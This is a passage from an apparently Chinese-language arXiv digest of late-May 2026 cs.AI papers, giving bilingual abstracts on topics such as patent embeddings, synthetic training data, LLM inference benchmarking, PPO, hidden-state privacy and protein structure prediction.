关于从业者使用专利嵌入的两个问题出现:(i) 一种微调方案是否适用于所有下游应用?(ii) 在一个专利领域上的微调是否足以用于其他领域的下游应用?通过评估22个预训练嵌入模型(参数从22M到12B)在三个任务——信息检索、分类和聚类——上的表现,使用113,148件WIPO辅助技术专利(46,069个引文查询)和外部DAPFAM数据集,我们发现两个结果对普遍认知提出了质疑。(i) 最优微调方案取决于下游任务:跨截面对齐(方案R3)对检索性能提升最大(+7.1% nDCG@10),而组合信号方案(方案R4)更适合分类(+7.1 F1)和聚类(+10.9 V-measure);匹配数据控制证实训练数据集大小的差异不是影响因素。(ii) 单一领域微调损害了跨领域信息检索:在DAPFAM语料库上,对8个模型-方案组合中的5个,单一领域微调显著降低了跨域检索性能,其中零样本能力较强的模型受损最严重。虽然族内扩展一致(Qwen3 0.6B->4B->8B;Llama-Nemotron 1B->8B),但族间扩展不稳定;12B的KaLM-Gemma3在TAC检索性能上排名第8,经过前缀修改后。标题+摘要+权利要求是普遍最佳文本视图,所有模型在域内和域外性能之间存在55-65%的差距,且无法通过混合BM25-密集融合来弥补。代码和评估框架已公开。

英文摘要

Two questions regarding practitioners' use of patent embeddings arise: (i) Does one fine-tuning recipe suffice for all downstream applications? (ii) Is fine-tuning on one patent landscape sufficient for downstream application on other landscapes? By evaluating 22 pre-trained embedding models (ranging from 22M to 12B parameters) on three tasks -- information retrieval, classification, and clustering -- on 113,148 WIPO patents for assistive technology (46,069 citation queries) and on an external DAPFAM dataset, we find that two results cast doubt on the prevailing wisdom. (i) The optimal fine-tuning recipe depends on the downstream task: cross-sectional alignment (recipe R3) provides the largest improvements to retrieval performance (+7.1% nDCG@10), whereas a combined signal recipe (recipe R4) is better suited to classification (+7.1 F1) and clustering (+10.9 V-measure); a matched data control confirms that differences in training dataset size are not a contributing factor. (ii) Single-landscape fine-tuning hampers cross-landscape information retrieval: fine-tuning on one landscape significantly degrades cross-domain retrieval for 5 of 8 model-recipe combinations on the DAPFAM corpus, with the stronger zero-shot models suffering most. While within-family scaling is consistent (Qwen3 0.6B->4B->8B; Llama-Nemotron 1B->8B), cross-family scaling is erratic; the 12B KaLM-Gemma3 is ranked 8th on TAC retrieval performance, following prefix modification. Title+Abstract+Claims is the ubiquitous best text view, and all models suffer from a 55-65% gap between IN and OUT-of-domain performance which cannot be mitigated by hybrid BM25-dense fusion. Code and evaluation framework are publicly available.

2605.24296 2026-05-27 cs.AI cs.IR 版本更新

When Does Synthetic Patent Data Help? Volume-Fidelity Trade-offs in Low-Resource Multi-Label Classification

合成专利数据何时有帮助?低资源多标签分类中的数量-保真度权衡

Amirhossein Yousefiramandi, Ciaran Cooney

发表机构 * Clarivate, Intellectual Property(Clarivate知识产权)

AI总结 研究通过LLM生成合成数据用于多标签专利分类时的数量与保真度权衡,发现低资源场景下数量效应主导,高资源场景下保真度更重要,混合数据策略最优。

详情
AI中文摘要

关于利用通过LLM生成的合成数据进行多标签专利分类时必须考虑的问题包括:(i) 何时使用此类数据可能有所帮助以及(ii) 为何如此。实际上,前一部分适当调整了通过增加样本量来改进结果的可能性。当前实验涉及六个开源LLM(从3.8B到12B参数),针对辅助技术64个WIPO标签分类的四种真实数据机制。应用了基于标签集条件化的全合成生成方法和释义方法,每种方法与三种分类器类别结合使用。结果表明,BERT-for-Patents的微F1从0.120到0.702的声称改进主要反映了数量效应;实际上,在165个样本中进行有放回复制产生了0.678。因此,相对于对照组的改进为+0.024,而与最佳基线(焦点损失重加权)相比为+0.219。这里要考虑的第二个关键点是随着数据生成机制变化,保真度分数的演变。对于低真实数据机制,数量效应占主导,最大均值差异(MMD)与分类性能之间的相关系数等于r = +0.95。随着使用更多真实数据,相关性变为负值,在1:10机制下达到r = -0.73(Fisher z = +6.47,p < 0.001,Delta r的95% CI [ +0.96, +1.00 ])。在固定预算分配方面,将真实数据(约20-30%)与合成数据(70-80%)结合优于纯合成和纯真实策略。此外,一个能够将原始微F1改进高达+0.58的语料库可能会对Jaccard重叠检索代理产生不利影响。其他体裁的提示族变体可能提供对该现象的一些解释,但使用标准专利过滤器仍使nDCG@10降低26%。

英文摘要

The issues that must be considered regarding the utilization of synthetic data generated through LLMs for multilabel patent classification include (i) when the use of such data may help and (ii) why. Indeed, the former part appropriately adjusts for the possibility of improving results by an increase in sample size. The current experiment involves six open-source LLMs (from 3.8B to 12B parameters) for four real-data regimes in classification of 64 WIPO labels of assistive technologies. Both full-synthesis generation, conditioned on the label set, and paraphrasing methods are applied, with each used in combination with three classifier categories. It is shown that the claimed improvements in micro F1 for BERT-for-Patents from 0.120 to 0.702 mainly reflect a volume effect; indeed, replication with replacement in 165 examples produces 0.678. Thus, the improvement over the control is +0.024, while compared to the best baseline (focal loss reweighting) is +0.219. The second crucial point to consider here is that of evolving fidelity scores as the data generation regime varies. For low real-data regimes, the volume effect dominates and the correlation coefficient between maximum mean discrepancy (MMD) and classification performance equals r = +0.95. As more real data is used, the correlation becomes inverted and reaches r = -0.73 at the 1:10 regime (Fisher z = +6.47, p < 0.001, 95% CI on Delta r [ +0.96, +1.00 ]). In terms of a fixed budget allocation, combining real data (about 20-30%) with synthetic (70-80%) outperforms both purely synthetic and purely real strategies. Moreover, a corpus that allows for improvement in classification performance up to +0.58 in raw micro F1 may adversely affect a Jaccard-overlap retrieval proxy. Prompt-family variations for other genres may provide some explanation of the phenomenon, but using the standard-patent filter still decreases nDCG@10 by 26%.

2605.24217 2026-05-27 cs.AI cs.DC 版本更新

Identifying and Mitigating Systemic Measurement Bias in Production LLM Inference Benchmarks

识别和减轻生产级LLM推理基准中的系统性测量偏差

Ashok Chandrasekar, Jason Kramberger

发表机构 * Google(谷歌)

AI总结 针对生产级LLM推理基准中因客户端排队导致的测量偏差,提出基于多进程的无偏评估框架和归一化输出令牌时间(NTPOT)指标,实现高并发下的准确性能评估。

详情
AI中文摘要

随着大型语言模型(LLM)从研究环境过渡到生产部署,评估其是否满足严格的服务水平目标(SLO)变得至关重要。然而,当前的评估方法在大规模下存在严重的测量偏差。我们证明,广泛使用的基准测试工具依赖于单进程、异步驱动架构,在高并发下引入了根本性的客户端排队瓶颈。通过将基准测试客户端建模为$M/G/1$队列,我们从数学上展示了Python全局解释器锁(GIL)如何随着请求速率增加而人为地膨胀首令牌时间(TTFT)和每输出令牌时间(TPOT)指标。为了解决这一系统性不准确性,我们提出了一个无偏的多进程评估框架,有效分散客户端负载,确保可忽略的排队开销。此外,我们形式化了一个复合指标——归一化每输出令牌时间(NTPOT),以稳健地摊销端到端延迟,包括跨序列长度的预填充和调度延迟。我们的实证评估表明,该方法成功隔离了纯服务引擎性能,能够在每秒数千个查询的生产规模下对LLM进行准确、可复现的性能分析。

英文摘要

As Large Language Models (LLMs) transition from research environments to production deployments, evaluating their performance against strict Service Level Objectives (SLOs) has become critical. However, current evaluation methodologies suffer from severe measurement bias at scale. We demonstrate that widely used benchmarking utilities rely on single-process, asyncio-driven architectures that introduce fundamental client-side queuing bottlenecks under high concurrency. By modeling the benchmarking client as an $M/G/1$ queue, we mathematically demonstrate how the Python Global Interpreter Lock (GIL) artificially inflates Time to First Token (TTFT) and Time Per Output Token (TPOT) metrics as request rates scale. To resolve this systematic inaccuracy, we propose an unbiased, multi-process evaluation framework that effectively distributes client-side load, ensuring negligible queuing overhead. Furthermore, we formalize a composite metric, Normalized Time Per Output Token (NTPOT), to robustly amortize end-to-end latency, including prefill and scheduling delays across sequence lengths. Our empirical evaluation demonstrates that this methodology successfully isolates pure serving engine performance, enabling accurate, reproducible profiling of LLMs at production scales exceeding thousands of queries per second.

2605.24152 2026-05-27 cs.AI 版本更新

Neuro-Inspired Inverse Learning for Planning and Control

神经启发式逆向学习用于规划与控制

Maryna Kapitonova, Tonio Ball

发表机构 * NeuroMentum AI IMBIT, University of Freiburg, Germany(NeuroMentum AI IMBIT,弗赖堡大学,德国)

AI总结 提出一种神经启发式框架Inverter,通过逆向学习(IL)结合前向/逆向内部模型、开环多步运动指令和层次化动作组织,在规划与控制任务中实现高效推理,平均性能提升24.2%且计算时间降低一到两个数量级。

Comments Version 2, minor fix in online version of the abstract, pdf unchanged

详情
AI中文摘要

我们提出了一种用于具身规划与控制的神经启发式框架。基于哺乳动物大脑中实现快速高效目标导向行为的三个原则——配对的前向/逆向内部模型、开环多步运动指令以及顺序层次化的动作组织——我们的Inverter框架使用学习组件,通过逆向学习(IL)进行端到端训练,并在自然情况下辅以解析或算法模块;我们形式化了IL,并将其与监督学习、强化学习和模仿学习区分开来。IL桥接了强化学习(RL)式的摊销(单次前向传播但每次只输出一个动作)和最优控制(OC)式的序列规划(整个轨迹但需要迭代测试时计算)。单个Inverter或层次化n=2的Inverter堆栈在所有3个maze2d和6个antmaze D4RL变体上,平均比离线RL和扩散规划基线提升24.2%(范围-1.9%至+78.2%),同时推理计算时间减少一到两个数量级。显著的是,通过前向模型(FoM)对整个T步动作序列进行优化(而非逐步骤优化),使得Inverter能够生成平滑、目标一致、轨迹级的结构,并达到比训练数据本身所蕴含的策略更接近解析最优的控制策略。我们还发现了IL的一种失败模式:在训练数据覆盖范围狭窄时出现FoM攻击,我们通过使用覆盖范围更广的随机训练数据来缓解。作为一个应用实例,脉冲Inverter合成任意单量子比特量子门,其保真度与标准迭代数值基线(GRAPE)相当,而每个门的计算时间降低超过1000倍。总之,我们得出结论:IL实现了一类通用的世界接口,特别适用于对延迟和资源敏感的具身AI。

英文摘要

We present a neuro-inspired framework for embodied planning and control. Building on three principles that enable fast and highly effective goal-directed behavior in the mammalian brain - paired forward/inverse internal models, open-loop multi-step motor commands, and sequential, hierarchical organization of action - our Inverter framework uses learned components, trained end-to-end through Inverse Learning (IL) and supplemented where natural by analytic or algorithmic modules; we formalize IL and delineate it from supervised, reinforcement, and imitation learning. IL bridges Reinforcement Learning (RL)-style amortization, which runs in a single forward pass but emits only one action at a time, and Optimal Control (OC)-style sequence planning over whole trajectories, but with iterative test-time computation. Single Inverters or hierarchical n=2 Inverter stacks match or improve on offline-RL and diffusion-planner baselines on all 3 maze2d and 6 antmaze D4RL variants by an average of +24.2% (range -1.9% to +78.2%), at one-to-two orders of magnitude less inference compute time. Distinctively, optimizing through the Forward Model (FoM) over the entire T-step action sequence - rather than per step - lets Inverters produce smooth, goal-coherent, trajectory-wide structure and reach control policies closer to the analytic optimum than the policy underlying the training data itself. We also identify a failure mode of IL: FoM hacking under narrow training-data coverage, which we mitigate by using random training data with broader coverage. As an application example, a Pulse Inverter synthesizes arbitrary single-qubit quantum gates with fidelity matching the standard iterative numerical baseline (GRAPE), at more than 1000x lower per-gate compute time. In summary, we conclude that IL enables a versatile class of world-interfaces, especially for latency- and resource-critical embodied AI.

2605.24071 2026-05-27 cs.LG cs.AI 版本更新

Not All Transitions Matter: Evidence from PPO

并非所有转移都重要:来自PPO的证据

Ajhesh Basnet

发表机构 * Department of Artificial Intelligence and Data Science(人工智能与数据科学系) KPR Institute of Engineering and Technology(KPR工程科技研究院)

AI总结 本文提出在PPO训练中随机丢弃一定比例的轨迹转移,以打破重复梯度结构,稳定训练,并在多个环境中验证了效果。

Comments 19 pages, 5 figures. Accepted to 2026 8th Asia Conference on Machine Learning and Computing (ACMLC 2026)

详情
Journal ref
Proceedings of the 2026 8th Asia Conference on Machine Learning and Computing
AI中文摘要

在策略上训练强化学习代理意味着每次更新时收集新的经验,而这些经验隐藏着一个问题。轨迹中的每个状态都是前一个状态的直接输出,由代理自身的动作因果链连接。因此,连续的转移从未真正独立。它们携带重叠信息,网络接收到的梯度信号最终比批次大小所暗示的要重复得多。相同的方向被反复强化,价值网络在策略变化时难以跟上,训练变得悄悄不稳定,而仅凭奖励曲线很少能揭示这一点。本文询问这种冗余是否可以简单地移除。我们表明,在适当阶段从轨迹中随机丢弃固定比例的转移,使得奖励信号保持完整,足以打破重复的梯度结构并稳定训练。变化很小:一个采样步骤,没有新组件,不修改核心算法,并且适用于任何PPO实现。在五个难度递增的环境(CartPole-v1、Acrobot-v1、LunarLander-v2、HalfCheetah-v5和Hopper-v5)中,该方法在奖励上与标准PPO匹配,同时在KL散度、策略熵和价值估计上产生更一致的训练动态。丢弃25%的转移是最佳点:足以破坏冗余,又不至于使批次过薄。

英文摘要

Training a reinforcement learning agent on-policy means collecting fresh experience at every update, and that experience comes with a hidden problem. Each state in a rollout is the direct output of the previous one, causally chained together by the agent's own actions. Because of this, consecutive transitions are never truly independent. They carry overlapping information, and the gradient signal the network receives ends up far more repetitive than the batch size suggests. The same directions get reinforced over and over, the value network struggles to keep up as the policy shifts, and training becomes quietly unstable in ways that reward curves alone rarely reveal. This paper asks whether that redundancy can simply be removed. We show that randomly dropping a fixed fraction of transitions from the rollout, at the right stage so the reward signal stays intact, is enough to break the repetitive gradient structure and stabilize training. The change is minimal: one sampling step, no new components, no modification to the core algorithm, and it works with any PPO implementation. Across five environments of increasing difficulty, CartPole-v1, Acrobot-v1, LunarLander-v2, HalfCheetah-v5, and Hopper-v5, the method matches vanilla PPO on reward while producing more consistent training dynamics across KL divergence, policy entropy, and value estimates. Dropping 25% of transitions turns out to be the sweet spot: enough to disrupt the redundancy, not enough to thin the batch.

2605.24042 2026-05-27 cs.LG cs.AI 版本更新

Hidden-State Privacy Has an Empty Middle

隐藏状态隐私存在空中间

Alexander Okezue Bell

发表机构 * Stanford University(斯坦福大学)

AI总结 通过理论下界和实验证明,高斯释放机制在隐藏状态隐私中无法同时实现中等效用和隐私,存在空中间区域,并提出了对角逆Fisher机制作为最优解。

Comments 74 pages, 61 figures

详情
AI中文摘要

在我们测试的1536个高斯释放协方差中,对于单层隐藏状态隐私,没有一个能在自适应检索攻击者下同时实现中等效用和中等隐私。我们证明了一个互补的Fisher球下界:每个具有O(1) Fisher效用的满秩高斯释放都存在一个方向,其马氏信号随隐藏宽度线性增长,排除了该类中的均匀高斯安全性,并与经验上的空中间匹配。对角逆Fisher释放Σ^⋆_{diag}(K) = (2K/d) diag(1/F_{ii})是在一阶KL预算K下唯一的最小最大最优对角机制,也是在32个模型层网格的每个点上最坏攻击者top-1 ≤ 0.001的唯一释放,但它位于隐私/效用边界上,而不是填充中间。在欧几里得检索下达到13倍帕累托缩减的广义特征机制,在自适应马氏攻击者下崩溃为100% top-1,而全轨迹序列逆变器恢复了干净GPT-2前缀的94%,但在Σ_{diag}下为0%。从头训练的分离记忆Transformer在90M时达到G_{Mah} ∈ [20, 33],并在固定token语言建模损失惩罚下,从30M到1B保持比相同预算GPT基线6-24倍的优势;预训练模型最高为9.3。这些结果将隐藏状态释放从高斯类内的机制设计重新定义为架构或释放协同设计。

英文摘要

Of $1{,}536$ Gaussian release covariances we tested for single-layer hidden-state privacy, zero achieve both moderate utility and moderate privacy against an adaptive retrieval attacker. We prove a complementary Fisher-ball lower bound: every full-rank Gaussian release at $O(1)$ Fisher utility admits a direction whose Mahalanobis signal grows linearly in hidden width, ruling out uniform Gaussian safety in the class and matching the empirical empty middle. The diagonal inverse-Fisher release $Σ^\star_{\mathrm{diag}}(\mathcal{K}) = (2\mathcal{K}/d)\,\mathrm{diag}(1/F_{ii})$ is the unique minimax-optimal diagonal mechanism at first-order KL budget $\mathcal{K}$ and the only release with worst-attacker top-1 $\le 0.001$ at every point of a 32 model-layer grid, but it sits on a privacy/utility edge rather than filling the middle. A generalized-eigen mechanism reaching $13\times$ Pareto reduction under Euclidean retrieval collapses to $100\%$ top-1 under the adaptive Mahalanobis attacker, and a full-trajectory sequence inverter recovers $94\%$ of clean GPT-2 prefixes but $0\%$ under $Σ_{\mathrm{diag}}$. A split-memory transformer trained from scratch reaches $G_{\mathrm{Mah}} \in [20, 33]$ at 90M and maintains a $6$--$24\times$ advantage over same-budget GPT baselines from 30M to 1B at a fixed-token language-modeling loss penalty; pretrained models top out at 9.3. These results reframe hidden-state release from mechanism-design within the Gaussian class to architecture or release co-design.

2605.24001 2026-05-27 cs.CV cs.AI cs.LG 版本更新

Diff-Instruct with Diffused Reward: Towards Principled One-step Generator RL

Diff-Instruct with Diffused Reward: 迈向有原则的一步生成器强化学习

Junyi Wu, Weijian Luo, Haoyang Zheng, Ruizhe Zhang, Guang Lin

发表机构 * Purdue University(普渡大学) hi-lab, Xiaohongshu Inc.(小红书实验室,小红书公司)

AI总结 针对一步生成器强化学习中奖励优化与生成动力学不匹配的问题,提出基于积分KL最小化的无数据轨迹级对齐框架DIDR,通过扩散奖励分数和代理估计器实现奖励驱动的校正,在一步SDXL和6B DiT骨干网络上取得帕累托优势。

Comments author list correction

详情
AI中文摘要

近期一步文本到图像生成的进展实现了实时合成,具有显著的效率和质量。先前用于一步生成器的强化学习方法将图像空间奖励优化与扩散噪声空间分布匹配相结合。这种范式由于终端奖励优化与底层生成动力学之间的不匹配带来了挑战。结果,优化倾向于利用随机自由度,通常以牺牲图像保真度为代价来提高奖励。为了解决这个问题,我们提出了Diff-Instruct with Diffused Reward (DIDR),一个从积分KL最小化推导出的无数据轨迹级对齐框架。DIDR将RLHF最优的奖励倾斜干净图像分布沿扩散轨迹传播到所有噪声水平。我们证明该目标与干净图像RLHF具有相同的最小化器,同时自然诱导出扩散奖励分数(DRS),它作为对参考分数函数的奖励驱动校正。为了使其实用,我们进一步引入了扩散奖励代理(DRP),一种基于可微短步去噪的DRS高效估计器。大量实验表明,DIDR持续帕累托主导现有的一步SDXL基线。此外,当迁移到6B DiT骨干网络(Z-Image)时,DIDR在偏好对齐上超越了其50步教师模型,同时仅需单步生成。

英文摘要

Recent advances in one-step text-to-image generation have enabled real-time synthesis with remarkable efficiency and quality. Previous reinforcement learning methods for one-step generators combine image-space reward optimization with diffusion noisy-space distribution matching. This paradigm brings challenges due to a mismatch between terminal reward optimization and the underlying generative dynamics. As a result, optimization tends to exploit stochastic degrees of freedom, often improving reward at the expense of image fidelity. To address this issue, we propose Diff-Instruct with Diffused Reward (DIDR), a data-free trajectory-level alignment framework derived from Integral KL minimization. DIDR propagates the RLHF-optimal reward-tilted clean-image distribution across all noise levels along the diffusion trajectory. We show that this objective admits the same minimizer as clean-image RLHF, while naturally inducing the Diffused Reward Score (DRS), which acts as a reward-driven correction to the reference score function. To make this practical, we further introduce the Diffused Reward Proxy (DRP), an efficient estimator of DRS based on differentiable short-step denoising. Extensive experiments demonstrate that DIDR consistently Pareto-dominates existing one-step SDXL baselines. Moreover, when transferred to a 6B DiT backbone (Z-Image), DIDR surpasses its 50-step teacher in preference alignment while requiring only a single generation step.

2605.22904 2026-05-27 cs.CV cs.AI 版本更新

Suicide Risk Assessment from AI-powered Video Surveillance: An Interpretable Framework for Prevention in Metro Stations

基于AI视频监控的自杀风险评估:地铁站预防的可解释框架

Safwen Naimi, Wassim Bouachir, Guillaume-Alexandre Bilodeau, Brian Mishara

发表机构 * Université TÉLUQ(大学TÉLUQ) Polytechnique Montréal(蒙特利尔理工学院) Université du Québec à Montréal(魁北克大学蒙特利尔分校)

AI总结 提出首个可解释框架,通过行人跟踪、活动识别、站台语义分割和轨迹风险热图建模,从监控视频中评估自杀风险,在真实数据上达到83.2% ROC-AUC。

Comments 9 pages, 6 figures, 1 table. Accepted for Publication in the International Joint Conference of Artificial Intelligence (IJCAI)

详情
AI中文摘要

理解并监控地铁站中的人类行为对于支持自杀预防工作至关重要,早期识别高风险情况能够实现及时干预。这需要通过对每个乘客的行为、其空间上下文和时间动态进行联合推理,从监控视频中评估自杀风险。然而,使用监控摄像头捕获的视频进行评估具有挑战性,因为它需要准确感知人体运动、理解站台几何结构,并随时间聚合异质行为线索。在这项工作中,我们正式定义了地铁站自杀风险评估(SRA)任务,并引入了首个解决这一挑战的可解释框架。与专注于孤立子任务或试图直接推断意图的方法不同,我们的公式通过整合行人跟踪、活动识别、站台语义分割和轨迹驱动的风险热图建模,从累积证据中评估自杀风险。通过将SRA形式化为一个独特任务,并在真实监控数据上基准测试一个完整的操作流程,实现了83.2%的ROC-AUC,这项工作突出了自杀风险评估的复杂性,并为面向社会公益的可解释AI系统研究开辟了新方向。

英文摘要

Understanding and monitoring human behavior in metro stations play an important role in supporting suicide prevention efforts, where early identification of high-risk situations can enable timely intervention. This requires assessing suicide risk from a surveillance video by jointly reasoning about the behavior of each passenger, his/her spatial context, and temporal dynamics. However, this assessment using videos captured by surveillance cameras is challenging, as it demands accurate perception of human motion, understanding of platform geometry, and aggregation of heterogeneous behavioral cues over time. In this work, we formalize the task of Suicide Risk Assessment (SRA) in metro stations and introduce the first interpretable framework that addresses this challenge. Unlike approaches that focus on isolated subtasks or attempt to infer intent directly, our formulation assesses suicide risk from accumulated evidence by incorporating person tracking, activity recognition, semantic segmentation of the platform, and trajectory-driven risk heatmap modeling. By formalizing SRA as a distinct task and benchmarking a complete operational pipeline achieving 83.2% ROC-AUC on real surveillance data, this work highlights the complexity of suicide risk assessment and opens new directions for research on interpretable AI systems for social good.

2605.22774 2026-05-27 cs.LG cs.AI cs.HC 版本更新

CogAdapt: Transferring Clinical ECG Foundation Models to Wearable Cognitive Load Assessment via Lead Adaptation

CogAdapt: 通过导联适应将临床心电图基础模型迁移至可穿戴认知负荷评估

Amir Mousavi, Erfan Nourbakhsh, Mohammad Sadegh Sirjani, Mimi Xie, Rocky Slavin, Leslie Neely, John Davis, John Quarles

发表机构 * Department of Computer Science, College of AI, Cyber and Computing, The University of Texas at San Antonio(计算机科学系,人工智能、网络与计算学院,德克萨斯大学圣安东尼奥分校) Department of Educational Psychology, College of Education and Human Development, The University of Texas at San Antonio(教育心理学系,教育与人类发展学院,德克萨斯大学圣安东尼奥分校)

AI总结 提出CogAdapt框架,通过可学习适配器LeadBridge将3导联可穿戴信号转换为12导联表示,并结合渐进微调策略ProFine,实现临床心电图基础模型向可穿戴认知负荷评估的迁移,在跨受试者验证中显著优于从头训练的基线模型。

Comments 7 pages, 7 figures. Submitted to IEEE-EMBS International Conference on Biomedical and Health Informatics (BHI 2026)

详情
AI中文摘要

实时认知负荷评估对于自适应人机交互至关重要,但由于标记数据有限和跨受试者泛化能力差,仍然具有挑战性。最近在数百万临床记录上预训练的心电图基础模型提供了丰富的表示,但由于传感器配置不匹配和任务差异,无法直接应用于可穿戴设备。在本文中,我们提出了CogAdapt,一个将临床心电图基础模型适应于可穿戴认知负荷评估的框架。CogAdapt引入了LeadBridge,一个可学习的适配器,将3导联可穿戴信号转换为解剖学一致的12导联表示,以及ProFine,一种渐进微调策略,逐步解冻编码器层同时防止灾难性遗忘。在两个公共数据集(CLARE和CL-Drive)上的留一受试者交叉验证评估表明,CogAdapt显著优于从头训练的基线,宏F1分数分别达到0.626和0.768。这些结果证明了基础模型适应用于从可穿戴传感器进行与受试者无关的认知负荷评估的前景。

英文摘要

Real-time cognitive load assessment is essential for adaptive human-computer interaction but remains challenging due to limited labeled data and poor cross-subject generalization. Recent ECG foundation models pre-trained on millions of clinical recordings offer rich representations, but cannot be directly applied to wearable devices due to sensor configuration mismatch and task differences. In this paper, we propose CogAdapt, a framework that adapts clinical ECG foundation models to wearable cognitive load assessment. CogAdapt introduces LeadBridge, a learnable adapter that transforms 3-lead wearable signals into anatomically consistent 12-lead representations, and ProFine, a progressive fine-tuning strategy that gradually unfreezes encoder layers while preventing catastrophic forgetting. Evaluations on two public datasets (CLARE and CL-Drive) under leave-one-subject-out cross-validation show that CogAdapt substantially outperforms baselines trained from scratch, achieving macro-F1 scores of 0.626 and 0.768. These results demonstrate the promise of foundation model adaptation for subject-independent cognitive load assessment from wearable sensors.

2605.22133 2026-05-27 q-bio.BM cs.AI 版本更新

Atom-level Protein Representation Learning Improves Protein Structure Prediction

原子级蛋白质表示学习改进蛋白质结构预测

Taewon Kim, Hyosoon Jang, Hyunjin Seo, Seonghwan Seo, Hyeongwoo Kim, Wonho Zhung, Mingyeong Shin, Wooyoun Kim, Sungsoo Ahn

发表机构 * KAIST(韩国科学技术院)

AI总结 提出结构感知预训练方法TriProRep,通过VQ-VAE联合建模三种对齐的残基级视图,在结构预测任务中优于仅序列和先前结构感知表示模型。

Comments Project Page: https://holymollyhao.github.io/TriProRep/

详情
AI中文摘要

生成建模的最新进展表明,预训练表示可以作为条件特征或对齐目标来改进生成。受此启发,我们研究用于预测结构(超越常规功能注释)的蛋白质表示。我们提出TriProRep,一种结构感知预训练方法,它联合建模三种对齐的残基级视图:氨基酸身份、主链几何和局部全原子几何,通过VQ-VAE分词器进行离散编码。通过预训练从生成器损坏的视图中恢复原始标记,TriProRep学会区分合理但不正确的跨视图增强与原始蛋白质。我们进一步引入RepSP,一个用于在结构预测设置中评估蛋白质表示的基准。RepSP测试表示的三种用途:从脱辅基链表示进行同源二聚体共折叠、同源二聚体衍生相互作用属性的残基级预测,以及表示对齐的单体结构预测。在这些任务中,TriProRep优于仅序列和先前的结构感知表示模型,同时在常规基准上保持竞争性能。

英文摘要

Recent advances in generative modeling show that pretrained representations can improve generation as conditioning features or alignment targets. Motivated by this, we study protein representations for predicting structures beyond conventional function annotation. We propose TriProRep, a structure-aware pretraining method that jointly models three aligned residue-level views: amino-acid identity, backbone geometry, and local full-atom geometry, discretely encoded via VQ-VAE tokenizers. By pretraining to recover original tokens from generator-corrupted views, TriProRep learns to distinguish plausible but incorrect cross-view augmentations from the original protein. We further introduce RepSP, a benchmark for evaluating protein representations in structure-predictive settings. RepSP tests three uses of representations: homodimer co-folding from apo-chain representations, residue-level prediction of homodimer-derived interaction properties, and representation-aligned monomer structure prediction. Across these tasks, TriProRep improves over sequence-only and prior structure-aware representation models, while maintaining competitive performance on conventional benchmarks.

2605.20988 2026-05-27 cs.LG cs.AI 版本更新

A Sharper Picture of Generalization in Transformers

Transformer 泛化能力的更清晰图景

Paul Lintilhac, Sair Shaikh

发表机构 * Thayer School of Engineering Dartmouth College(达特茅斯学院泰勒工程学院)

AI总结 本文通过PAC-Bayes理论研究Transformer在布尔域上的泛化行为,证明稀疏低阶频谱可实现低锐度构造并得到非平凡的泛化界,解释了思维链为何能改善高阶目标函数的泛化。

Comments 10 pages, 9 figures, 41 pages of supplementary material

详情
AI中文摘要

我们从目标函数的傅里叶谱角度研究Transformer在布尔域上的泛化行为。与先前基于Rademacher复杂度推导泛化界的工作(Edelman等人,2022;Trauger & Tosh,2024)不同,我们探讨了通过PAC-Bayes理论获得泛化界的可行性。我们证明,集中在低阶分量上的稀疏谱能够实现具有良好泛化性质的低锐度构造。我们的思路是证明存在实现任何稀疏度不超过上下文长度的布尔函数的平坦极小值,然后将PAC-Bayes界应用于一个理想化的低锐度学习器,从而得到一个非平凡的泛化界。我们利用这一点正式解释了为什么思维链能改善高阶目标函数的泛化,并展示了我们界中的复杂度参数可以通过性质测试高效估计。我们通过实验评估了预测,并进行了机制可解释性研究,以支持我们的理论构造在真实Transformer中的现实性。

英文摘要

We study transformers' generalization behavior on boolean domains from the perspective of the Fourier spectra of their target functions. In contrast to prior work (Edelman et al., 2022; Trauger & Tosh, 2024), which derived generalization bounds from Rademacher complexity, we investigate the feasibility of obtaining generalization bounds via PAC-Bayes theory. We show that sparse spectra concentrated on low-degree components enable low-sharpness constructions with good generalization properties. Our idea is to show the existence of flat minima implementing any boolean function of sparsity no greater than the context length, and then apply a PAC-Bayes bound to an idealized low-sharpness learner, resulting in a non-vacuous generalization bound. We use this to give a formal account of why chain-of-thought improves generalization for high-degree target functions, and show that the complexity parameters in our bound can be efficiently estimated via property testing. We evaluate predictions empirically and conduct a mechanistic interpretability study to support the realism of our theoretical construction in real transformers.

2605.20690 2026-05-27 cs.AI 版本更新

Declarative Data Services: Structured Agentic Discovery for Composing Data Systems

声明式数据服务:用于组合数据系统的结构化智能体发现

Shanshan Ye, Duo Lu

发表机构 * Northeastern University(东北大学) Brown University(布朗大学)

AI总结 提出声明式数据服务(DDS)架构,通过分层类型契约将全局搜索分解为有界子搜索,解决无界智能体发现无法稳定收敛的问题,并在交易后端工作负载上验证其有效性。

Comments Accepted at AI Agents for Discovery in the Wild (AID-Wild), Workshop at ACM CAIS 2026

详情
AI中文摘要

智能体发现已表明,在基准条件下,LLM驱动的搜索能够发现新颖的算法、设计和代码。将该范式迁移到多系统数据后端面临一个更困难的问题:搜索空间是异构的,验证器是部署栈是否实际运行,且组合知识在预训练中不均匀地捕获。即使添加了迭代和显式组合知识,无界智能体发现(一个基于失败日志反馈迭代的编码智能体)也无法在运行栈上一致收敛。我们提出声明式数据服务(DDS),一种从声明式用户意图中结构化智能体发现数据系统组合的架构。该框架在连续层(意图、操作DAG、每系统技能、运行时归因)拥有四个类型契约,将全局搜索分解为有界子搜索;子智能体搜索每个类型空间,而框架提供通道,使知识以内联技能引用的方式向前流动,错误以类型信号的方式向后路由。作为交易后端工作负载的生命证明,DDS在无界发现无法收敛的地方收敛;运行时失败成为技能补丁,下一次部署内联引用。我们将其定位为早期原型,报告来自真实世界数据系统组合的经验教训。

英文摘要

Agentic discovery has shown that LLM-driven search can find novel algorithms, designs, and code under benchmark conditions. Translating the paradigm to multi-system data backends surfaces a harder problem: the search space is heterogeneous, the verifier is whether a deployed stack actually runs, and composition knowledge is unevenly captured in pretraining. Unbounded agentic discovery, a coding agent iterating on failure-log feedback, fails to converge consistently on a working stack even when iteration and explicit composition knowledge are added. We propose Declarative Data Services (DDS), an architecture for structured agentic discovery of data-system compositions from declarative user intent. The framework owns four typed contracts at successive layers (intent, operator DAG, per-system skills, runtime attribution) that decompose the global search into bounded sub-searches; sub-agents search each typed space, while the framework provides the channels by which knowledge flows forward as inline skill citations and errors route backward as typed signals. As a proof of life on a trading-backend workload, DDS converges where unbounded discovery does not; runtime failures become skill patches that the next deployment cites inline. We position this as an early prototype reporting lessons from real-world data-system composition.

2605.20255 2026-05-27 cs.LG cs.AI cs.HC cs.RO 版本更新

Multi-Agent Reinforcement Learning for Safe Autonomous Driving Under Pedestrian Behavioral Uncertainty

